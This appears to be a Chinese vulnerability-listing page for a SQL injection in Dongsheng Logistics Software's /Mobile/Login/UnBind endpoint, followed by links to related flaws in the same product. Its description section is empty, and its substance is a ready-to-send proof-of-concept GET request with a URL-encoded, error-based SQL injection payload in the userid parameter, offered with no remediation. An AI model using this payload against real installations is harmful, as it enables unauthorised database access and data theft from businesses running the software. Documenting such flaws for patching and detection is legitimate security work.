东胜物流软件 UnBind 存在SQL注入漏洞

漏洞描述

PoC代码

GET
/Mobile/Login/UnBind?userid=-2963%27+OR+1636+IN+%28SELECT+%28CHAR%28113%29%2BCHAR%28120%29%2BCHAR%28113%29%
2BCHAR%2898%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%281636%3D1636%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%
29+END%29%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%2898%29%2BCHAR%28113%29%29%29--+oTEn
HTTP/1.1

相关漏洞推荐

• 东胜物流软件 /Mobile/Login/UnBind SQL 注入漏洞
• 东胜物流软件 YJCX.aspx SQL注入漏洞
• 东胜物流软件 UnBind SQL注入漏洞
• 东胜物流软件 YJCX.aspx 存在SQL注入漏洞
• POC 东胜物流软件 /MvcShipping/MsChFee/GetFeeOpRang SQL 注入漏洞
• 东胜物流软件 /Areas/Mobile/Views/Login/UserInfo.aspx SQL 注入漏洞
• POC 东胜物流软件 UserInfo.aspx SQL注入漏洞
• 青岛东胜伟业软件有限公司东胜物流软件存在SQL注入漏洞
• 东胜物流软件 UpdateCustomMainfast XXE漏洞
• POC dongshengwuliu-getdatalistca-sqli: 东胜物流软件GetDataListCA接口存在SQL注⼊漏洞
• POC dongshengwuliu-workflowgridsource-sqli: 东胜物流软件WorkFlowGridSource.aspx接口存在SQL注入漏洞
• 东胜物流软件 /Account/Chfee_hexiao/GetDataList SQL 注入漏洞
• POC 东胜物流软件 /WebService/DsWebService.asmx SQL 注入漏洞